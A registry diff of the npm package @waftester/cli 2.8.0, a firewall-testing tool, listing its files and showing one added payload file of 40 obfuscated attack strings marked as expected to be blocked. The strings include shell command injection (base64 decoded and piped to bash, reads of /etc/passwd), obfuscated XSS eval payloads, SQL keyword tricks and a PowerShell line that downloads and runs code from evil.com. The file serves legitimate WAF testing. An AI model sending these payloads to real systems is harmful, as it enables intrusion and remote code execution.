@waftester/cli 2.8.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (141) hide show
  1. package/LICENSE +80 -0
  2. package/LICENSE-COMMUNITY +28 -0
  3. package/README.md +121 -0
  4. package/bin/cli.js +152 -0
  5. package/package.json +52 -0
  6. package/payloads/community/README.md +45 -0
  7. package/payloads/community/ai/ml-poisoning.json +173 -0
  8. package/payloads/community/ai/prompt-injection.json +247 -0
  9. package/payloads/community/ai/workflow-abuse.json +222 -0
  10. package/payloads/community/auth/jwt.json +855 -0
  11. package/payloads/community/auth/login-bypass.json +623 -0
  12. package/payloads/community/auth/mfa.json +402 -0
  13. package/payloads/community/auth/oauth.json +421 -0
  14. package/payloads/community/auth/open-redirect.json +1028 -0
  15. package/payloads/community/auth/session.json +404 -0
  16. package/payloads/community/cache/deception.json +402 -0
  17. package/payloads/community/cache/poisoning.json +403 -0
  18. package/payloads/community/deserialization/gadget.json +375 -0
  19. package/payloads/community/deserialization/prototype.json +370 -0
  20. package/payloads/community/fuzz/content-type.json +397 -0
  21. package/payloads/community/fuzz/headers.json +401 -0
  22. package/payloads/community/fuzz/methods.json +397 -0
  23. package/payloads/community/fuzz/obfuscation.json +362 -0
  24. package/payloads/community/fuzz/special-chars.json +740 -0
  25. package/payloads/community/fuzz/waf-bypass.json +452 -0
  26. package/payloads/community/graphql/batching-abuse.json +271 -0
  27. package/payloads/community/graphql/depth-limit.json +271 -0
  28. package/payloads/community/graphql/introspection.json +267 -0
  29. package/payloads/community/injection/crlf.json +569 -0
  30. package/payloads/community/injection/ldap.json +357 -0
  31. package/payloads/community/injection/nosqli.json +529 -0
  32. package/payloads/community/injection/oscmd.json +662 -0
  33. package/payloads/community/injection/rce-polyglots.json +452 -0
  34. package/payloads/community/injection/sqli.json +681 -0
  35. package/payloads/community/injection/ssti.json +584 -0
  36. package/payloads/community/injection/upload-attacks.json +632 -0
  37. package/payloads/community/injection/xpath.json +357 -0
  38. package/payloads/community/injection/xxe.json +716 -0
  39. package/payloads/community/logic/forced-browsing.json +405 -0
  40. package/payloads/community/logic/idor.json +1026 -0
  41. package/payloads/community/logic/privilege.json +337 -0
  42. package/payloads/community/media/exif-injection.json +225 -0
  43. package/payloads/community/media/metadata-poison.json +239 -0
  44. package/payloads/community/protocol/http-smuggling.json +798 -0
  45. package/payloads/community/protocol/http2-attacks.json +382 -0
  46. package/payloads/community/protocol/websocket-abuse.json +375 -0
  47. package/payloads/community/rate-limit/burst-simulation.json +286 -0
  48. package/payloads/community/rate-limit/bypass-attempts.json +326 -0
  49. package/payloads/community/rate-limit/zone-tests.json +332 -0
  50. package/payloads/community/services/authentik.json +415 -0
  51. package/payloads/community/services/immich.json +423 -0
  52. package/payloads/community/services/n8n.json +366 -0
  53. package/payloads/community/sqli-basic.json +182 -0
  54. package/payloads/community/ssrf/cloud-metadata.json +999 -0
  55. package/payloads/community/ssrf/dns-rebinding.json +503 -0
  56. package/payloads/community/ssrf/internal-networks.json +627 -0
  57. package/payloads/community/ssrf/protocol-smuggling.json +350 -0
  58. package/payloads/community/ssti/multi-language-templates.json +191 -0
  59. package/payloads/community/ssti/python-templates.json +200 -0
  60. package/payloads/community/traversal/basic.json +675 -0
  61. package/payloads/community/traversal/cloud-credentials.json +107 -0
  62. package/payloads/community/traversal/config-files.json +193 -0
  63. package/payloads/community/traversal/encoding.json +558 -0
  64. package/payloads/community/traversal/null-byte.json +105 -0
  65. package/payloads/community/traversal/symlink.json +93 -0
  66. package/payloads/community/traversal/unicode.json +134 -0
  67. package/payloads/community/traversal/unix-advanced.json +195 -0
  68. package/payloads/community/traversal/windows-advanced.json +195 -0
  69. package/payloads/community/waf-bypass/cloudflare-bypass.json +102 -0
  70. package/payloads/community/waf-bypass/encoding-bypass.json +120 -0
  71. package/payloads/community/waf-bypass/evasion-techniques.json +164 -0
  72. package/payloads/community/waf-bypass/hpp-bypass.json +92 -0
  73. package/payloads/community/waf-bypass/modsecurity-crs.json +220 -0
  74. package/payloads/community/waf-bypass/protocol-attacks.json +101 -0
  75. package/payloads/community/waf-bypass/sqlmap-tamper.json +252 -0
  76. package/payloads/community/waf-bypass/unicode-charset.json +152 -0
  77. package/payloads/community/waf-bypass/vendor-bypasses.json +72 -0
  78. package/payloads/community/waf-validation/README.md +172 -0
  79. package/payloads/community/waf-validation/bypass-techniques.json +272 -0
  80. package/payloads/community/waf-validation/custom-rules.json +952 -0
  81. package/payloads/community/waf-validation/evasion-techniques.json +272 -0
  82. package/payloads/community/waf-validation/modsecurity-core.json +151 -0
  83. package/payloads/community/waf-validation/owasp-top10.json +236 -0
  84. package/payloads/community/waf-validation/regression-tests.json +227 -0
  85. package/payloads/community/xss/csp-bypass.json +431 -0
  86. package/payloads/community/xss/dom.json +389 -0
  87. package/payloads/community/xss/filter-bypass.json +1242 -0
  88. package/payloads/community/xss/mutation.json +263 -0
  89. package/payloads/community/xss/polyglots.json +371 -0
  90. package/payloads/community/xss/reflected.json +187 -0
  91. package/payloads/community/xss/stored.json +330 -0
  92. package/payloads/crlf-injection.json +182 -0
  93. package/payloads/ids-map.json +155 -0
  94. package/payloads/ldap-injection.json +182 -0
  95. package/payloads/nosql-injection.json +227 -0
  96. package/payloads/prototype-pollution.json +182 -0
  97. package/payloads/request-smuggling.json +182 -0
  98. package/payloads/version.json +28 -0
  99. package/payloads/xss-advanced.json +227 -0
  100. package/templates/README.md +221 -0
  101. package/templates/nuclei/http/waf-bypass/crlf-bypass.yaml +146 -0
  102. package/templates/nuclei/http/waf-bypass/lfi-bypass.yaml +152 -0
  103. package/templates/nuclei/http/waf-bypass/nosqli-bypass.yaml +166 -0
  104. package/templates/nuclei/http/waf-bypass/rce-bypass.yaml +171 -0
  105. package/templates/nuclei/http/waf-bypass/sqli-basic.yaml +142 -0
  106. package/templates/nuclei/http/waf-bypass/sqli-evasion.yaml +192 -0
  107. package/templates/nuclei/http/waf-bypass/ssrf-bypass.yaml +130 -0
  108. package/templates/nuclei/http/waf-bypass/ssti-bypass.yaml +147 -0
  109. package/templates/nuclei/http/waf-bypass/xss-basic.yaml +163 -0
  110. package/templates/nuclei/http/waf-bypass/xss-evasion.yaml +217 -0
  111. package/templates/nuclei/http/waf-bypass/xxe-bypass.yaml +204 -0
  112. package/templates/nuclei/http/waf-detection/akamai-detect.yaml +105 -0
  113. package/templates/nuclei/http/waf-detection/aws-waf-detect.yaml +115 -0
  114. package/templates/nuclei/http/waf-detection/azure-waf-detect.yaml +114 -0
  115. package/templates/nuclei/http/waf-detection/cloudflare-detect.yaml +121 -0
  116. package/templates/nuclei/http/waf-detection/modsecurity-detect.yaml +129 -0
  117. package/templates/nuclei/workflows/waf-assessment-workflow.yaml +71 -0
  118. package/templates/output/asff.tmpl +61 -0
  119. package/templates/output/csv.tmpl +4 -0
  120. package/templates/output/junit.tmpl +34 -0
  121. package/templates/output/markdown-report.tmpl +92 -0
  122. package/templates/output/slack-notification.tmpl +95 -0
  123. package/templates/output/text-summary.tmpl +56 -0
  124. package/templates/overrides/api-only.yaml +130 -0
  125. package/templates/overrides/crs-tuning.yaml +204 -0
  126. package/templates/overrides/false-positive-suppression.yaml +159 -0
  127. package/templates/policies/owasp-top10.yaml +152 -0
  128. package/templates/policies/pci-dss.yaml +124 -0
  129. package/templates/policies/permissive.yaml +40 -0
  130. package/templates/policies/standard.yaml +57 -0
  131. package/templates/policies/strict.yaml +72 -0
  132. package/templates/report-configs/compliance.yaml +173 -0
  133. package/templates/report-configs/dark.yaml +136 -0
  134. package/templates/report-configs/enterprise.yaml +175 -0
  135. package/templates/report-configs/minimal.yaml +84 -0
  136. package/templates/report-configs/print.yaml +139 -0
  137. package/templates/workflows/api-scan.yaml +132 -0
  138. package/templates/workflows/ci-gate.yaml +129 -0
  139. package/templates/workflows/full-scan.yaml +133 -0
  140. package/templates/workflows/quick-probe.yaml +80 -0
  141. package/templates/workflows/waf-detection.yaml +89 -0
package/payloads/community/fuzz/obfuscation.json ADDED
@@ -0,0 +1,362 @@
1
+ [
2
+ {
3
+ "id": "OBFUSC-001",
4
+ "payload": "Y2F0IC9ldGMvcGFzc3dk",
5
+ "tags": ["base64", "command", "quick"],
6
+ "expected_block": true,
7
+ "severity_hint": "High",
8
+ "notes": "Base64 encoded 'cat /etc/passwd'",
9
+ "category": "Obfuscation"
10
+ },
11
+ {
12
+ "id": "OBFUSC-002",
13
+ "payload": ";echo Y2F0IC9ldGMvcGFzc3dk|base64 -d|bash",
14
+ "tags": ["base64", "decode-exec"],
15
+ "expected_block": true,
16
+ "severity_hint": "Critical",
17
+ "notes": "Base64 decode and execute",
18
+ "category": "Obfuscation"
19
+ },
20
+ {
21
+ "id": "OBFUSC-003",
22
+ "payload": "$(echo 'aWQ=' | base64 -d)",
23
+ "tags": ["base64", "substitution"],
24
+ "expected_block": true,
25
+ "severity_hint": "Critical",
26
+ "notes": "Base64 in command substitution",
27
+ "category": "Obfuscation"
28
+ },
29
+ {
30
+ "id": "OBFUSC-004",
31
+ "payload": ";printf '\\x69\\x64'|sh",
32
+ "tags": ["hex", "printf-exec"],
33
+ "expected_block": true,
34
+ "severity_hint": "Critical",
35
+ "notes": "Hex printf pipe to shell",
36
+ "category": "Obfuscation"
37
+ },
38
+ {
39
+ "id": "OBFUSC-005",
40
+ "payload": ";$'\\x69\\x64'",
41
+ "tags": ["hex", "ansi-c-quote"],
42
+ "expected_block": true,
43
+ "severity_hint": "Critical",
44
+ "notes": "ANSI-C hex escape execution",
45
+ "category": "Obfuscation"
46
+ },
47
+ {
48
+ "id": "OBFUSC-006",
49
+ "payload": ";$(echo 6964 | xxd -r -p)",
50
+ "tags": ["hex", "xxd"],
51
+ "expected_block": true,
52
+ "severity_hint": "Critical",
53
+ "notes": "xxd hex decode execution",
54
+ "category": "Obfuscation"
55
+ },
56
+ {
57
+ "id": "OBFUSC-007",
58
+ "payload": ";eval $(echo $'\\x69\\x64')",
59
+ "tags": ["eval", "hex-escape"],
60
+ "expected_block": true,
61
+ "severity_hint": "Critical",
62
+ "notes": "Eval with hex escaped string",
63
+ "category": "Obfuscation"
64
+ },
65
+ {
66
+ "id": "OBFUSC-008",
67
+ "payload": ";python -c 'exec(\"\\x69\\x64\")'",
68
+ "tags": ["python", "hex-exec"],
69
+ "expected_block": true,
70
+ "severity_hint": "Critical",
71
+ "notes": "Python exec with hex string",
72
+ "category": "Obfuscation"
73
+ },
74
+ {
75
+ "id": "OBFUSC-009",
76
+ "payload": ";rev<<<'di'|sh",
77
+ "tags": ["reverse", "here-string"],
78
+ "expected_block": true,
79
+ "severity_hint": "Critical",
80
+ "notes": "String reverse obfuscation",
81
+ "category": "Obfuscation"
82
+ },
83
+ {
84
+ "id": "OBFUSC-010",
85
+ "payload": ";$(rev<<<'dwssap/cte/ tac')",
86
+ "tags": ["reverse", "substitution"],
87
+ "expected_block": true,
88
+ "severity_hint": "Critical",
89
+ "notes": "Reversed command in substitution",
90
+ "category": "Obfuscation"
91
+ },
92
+ {
93
+ "id": "OBFUSC-011",
94
+ "payload": ";a]d;b]i[;$a$b",
95
+ "tags": ["variable", "split"],
96
+ "expected_block": true,
97
+ "severity_hint": "Critical",
98
+ "notes": "Variable-based command construction",
99
+ "category": "Obfuscation"
100
+ },
101
+ {
102
+ "id": "OBFUSC-012",
103
+ "payload": ";X=id;Y=$(echo $X);$Y",
104
+ "tags": ["variable", "chain"],
105
+ "expected_block": true,
106
+ "severity_hint": "Critical",
107
+ "notes": "Variable chain construction",
108
+ "category": "Obfuscation"
109
+ },
110
+ {
111
+ "id": "OBFUSC-013",
112
+ "payload": ";echo $PATH|cut -c1",
113
+ "tags": ["path", "extraction"],
114
+ "expected_block": true,
115
+ "severity_hint": "High",
116
+ "notes": "PATH character extraction",
117
+ "category": "Obfuscation"
118
+ },
119
+ {
120
+ "id": "OBFUSC-014",
121
+ "payload": ";$(tr '[a-z]' '[n-za-m]' <<< 'vq')",
122
+ "tags": ["rot13", "transform"],
123
+ "expected_block": true,
124
+ "severity_hint": "Critical",
125
+ "notes": "ROT13 command obfuscation",
126
+ "category": "Obfuscation"
127
+ },
128
+ {
129
+ "id": "OBFUSC-015",
130
+ "payload": "SELECT CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)",
131
+ "tags": ["sqli", "char-concat"],
132
+ "expected_block": true,
133
+ "severity_hint": "Critical",
134
+ "notes": "SQL CHAR() concatenation",
135
+ "category": "Obfuscation"
136
+ },
137
+ {
138
+ "id": "OBFUSC-016",
139
+ "payload": "SELECT 0x53454C454354",
140
+ "tags": ["sqli", "hex-string"],
141
+ "expected_block": true,
142
+ "severity_hint": "Critical",
143
+ "notes": "SQL hex string literal",
144
+ "category": "Obfuscation"
145
+ },
146
+ {
147
+ "id": "OBFUSC-017",
148
+ "payload": "SELECT UNHEX('53454C454354')",
149
+ "tags": ["sqli", "unhex"],
150
+ "expected_block": true,
151
+ "severity_hint": "Critical",
152
+ "notes": "SQL UNHEX function",
153
+ "category": "Obfuscation"
154
+ },
155
+ {
156
+ "id": "OBFUSC-018",
157
+ "payload": "SELECT CONCAT('SEL','ECT')",
158
+ "tags": ["sqli", "concat-split"],
159
+ "expected_block": true,
160
+ "severity_hint": "Critical",
161
+ "notes": "SQL CONCAT keyword split",
162
+ "category": "Obfuscation"
163
+ },
164
+ {
165
+ "id": "OBFUSC-019",
166
+ "payload": "SELECT REVERSE('TCELES')",
167
+ "tags": ["sqli", "reverse"],
168
+ "expected_block": true,
169
+ "severity_hint": "High",
170
+ "notes": "SQL REVERSE function",
171
+ "category": "Obfuscation"
172
+ },
173
+ {
174
+ "id": "OBFUSC-020",
175
+ "payload": "SELECT/*comment*/1",
176
+ "tags": ["sqli", "comment-insert"],
177
+ "expected_block": true,
178
+ "severity_hint": "High",
179
+ "notes": "SQL inline comment insertion",
180
+ "category": "Obfuscation"
181
+ },
182
+ {
183
+ "id": "OBFUSC-021",
184
+ "payload": "<script>eval(atob('YWxlcnQoMSk='))</script>",
185
+ "tags": ["xss", "base64-eval"],
186
+ "expected_block": true,
187
+ "severity_hint": "Critical",
188
+ "notes": "XSS base64 atob eval",
189
+ "category": "Obfuscation"
190
+ },
191
+ {
192
+ "id": "OBFUSC-022",
193
+ "payload": "<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>",
194
+ "tags": ["xss", "charcode"],
195
+ "expected_block": true,
196
+ "severity_hint": "Critical",
197
+ "notes": "XSS String.fromCharCode",
198
+ "category": "Obfuscation"
199
+ },
200
+ {
201
+ "id": "OBFUSC-023",
202
+ "payload": "<script>eval('\\x61\\x6c\\x65\\x72\\x74\\x28\\x31\\x29')</script>",
203
+ "tags": ["xss", "hex-escape"],
204
+ "expected_block": true,
205
+ "severity_hint": "Critical",
206
+ "notes": "XSS hex escape in string",
207
+ "category": "Obfuscation"
208
+ },
209
+ {
210
+ "id": "OBFUSC-024",
211
+ "payload": "<script>eval('\\141\\154\\145\\162\\164\\50\\61\\51')</script>",
212
+ "tags": ["xss", "octal-escape"],
213
+ "expected_block": true,
214
+ "severity_hint": "Critical",
215
+ "notes": "XSS octal escape in string",
216
+ "category": "Obfuscation"
217
+ },
218
+ {
219
+ "id": "OBFUSC-025",
220
+ "payload": "<script>eval('\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029')</script>",
221
+ "tags": ["xss", "unicode-escape"],
222
+ "expected_block": true,
223
+ "severity_hint": "Critical",
224
+ "notes": "XSS Unicode escape in string",
225
+ "category": "Obfuscation"
226
+ },
227
+ {
228
+ "id": "OBFUSC-026",
229
+ "payload": "<script>[]['constructor']['constructor']('alert(1)')()</script>",
230
+ "tags": ["xss", "constructor-chain"],
231
+ "expected_block": true,
232
+ "severity_hint": "Critical",
233
+ "notes": "XSS constructor chain",
234
+ "category": "Obfuscation"
235
+ },
236
+ {
237
+ "id": "OBFUSC-027",
238
+ "payload": "<script>(0)['constructor']['constructor']('alert(1)')()</script>",
239
+ "tags": ["xss", "number-prototype"],
240
+ "expected_block": true,
241
+ "severity_hint": "Critical",
242
+ "notes": "XSS via Number prototype",
243
+ "category": "Obfuscation"
244
+ },
245
+ {
246
+ "id": "OBFUSC-028",
247
+ "payload": "<script>window['al'+'ert'](1)</script>",
248
+ "tags": ["xss", "string-concat"],
249
+ "expected_block": true,
250
+ "severity_hint": "Critical",
251
+ "notes": "XSS string concatenation access",
252
+ "category": "Obfuscation"
253
+ },
254
+ {
255
+ "id": "OBFUSC-029",
256
+ "payload": "<script>self[/al/.source+/ert/.source](1)</script>",
257
+ "tags": ["xss", "regex-source"],
258
+ "expected_block": true,
259
+ "severity_hint": "Critical",
260
+ "notes": "XSS regex source property",
261
+ "category": "Obfuscation"
262
+ },
263
+ {
264
+ "id": "OBFUSC-030",
265
+ "payload": "<script>this[('al'+'ert')](1)</script>",
266
+ "tags": ["xss", "bracket-concat"],
267
+ "expected_block": true,
268
+ "severity_hint": "Critical",
269
+ "notes": "XSS bracket notation concat",
270
+ "category": "Obfuscation"
271
+ },
272
+ {
273
+ "id": "OBFUSC-031",
274
+ "payload": "<script>location='javascript:'+('al'+'ert(1)')</script>",
275
+ "tags": ["xss", "location-concat"],
276
+ "expected_block": true,
277
+ "severity_hint": "Critical",
278
+ "notes": "XSS location assignment concat",
279
+ "category": "Obfuscation"
280
+ },
281
+ {
282
+ "id": "OBFUSC-032",
283
+ "payload": "<script>Function('alert(1)')()</script>",
284
+ "tags": ["xss", "function-constructor"],
285
+ "expected_block": true,
286
+ "severity_hint": "Critical",
287
+ "notes": "XSS Function constructor",
288
+ "category": "Obfuscation"
289
+ },
290
+ {
291
+ "id": "OBFUSC-033",
292
+ "payload": "<script>new Function`${'alert(1)'}```</script>",
293
+ "tags": ["xss", "tagged-template"],
294
+ "expected_block": true,
295
+ "severity_hint": "Critical",
296
+ "notes": "XSS tagged template literal",
297
+ "category": "Obfuscation"
298
+ },
299
+ {
300
+ "id": "OBFUSC-034",
301
+ "payload": "<script>setTimeout`alert(1)`</script>",
302
+ "tags": ["xss", "settimeout-template"],
303
+ "expected_block": true,
304
+ "severity_hint": "Critical",
305
+ "notes": "XSS setTimeout template literal",
306
+ "category": "Obfuscation"
307
+ },
308
+ {
309
+ "id": "OBFUSC-035",
310
+ "payload": "<script>import('data:text/javascript,alert(1)')</script>",
311
+ "tags": ["xss", "dynamic-import"],
312
+ "expected_block": true,
313
+ "severity_hint": "Critical",
314
+ "notes": "XSS dynamic import data URL",
315
+ "category": "Obfuscation"
316
+ },
317
+ {
318
+ "id": "OBFUSC-036",
319
+ "payload": "powershell -e cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlAA==",
320
+ "tags": ["powershell", "base64"],
321
+ "expected_block": true,
322
+ "severity_hint": "Critical",
323
+ "notes": "PowerShell base64 encoded",
324
+ "category": "Obfuscation"
325
+ },
326
+ {
327
+ "id": "OBFUSC-037",
328
+ "payload": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).downloadstring('http://evil.com/a')",
329
+ "tags": ["powershell", "download-exec"],
330
+ "expected_block": true,
331
+ "severity_hint": "Critical",
332
+ "notes": "PowerShell download and execute",
333
+ "category": "Obfuscation"
334
+ },
335
+ {
336
+ "id": "OBFUSC-038",
337
+ "payload": "cmd /c \"set a=who&set b=ami&call %a%%b%\"",
338
+ "tags": ["windows", "variable-concat"],
339
+ "expected_block": true,
340
+ "severity_hint": "Critical",
341
+ "notes": "Windows variable concatenation",
342
+ "category": "Obfuscation"
343
+ },
344
+ {
345
+ "id": "OBFUSC-039",
346
+ "payload": "cmd /c \"for /f %i in ('whoami') do @echo %i\"",
347
+ "tags": ["windows", "for-loop"],
348
+ "expected_block": true,
349
+ "severity_hint": "Critical",
350
+ "notes": "Windows FOR loop execution",
351
+ "category": "Obfuscation"
352
+ },
353
+ {
354
+ "id": "OBFUSC-040",
355
+ "payload": "c^m^d /c whoami",
356
+ "tags": ["windows", "caret-escape"],
357
+ "expected_block": true,
358
+ "severity_hint": "Critical",
359
+ "notes": "Windows caret escape",
360
+ "category": "Obfuscation"
361
+ }
362
+ ]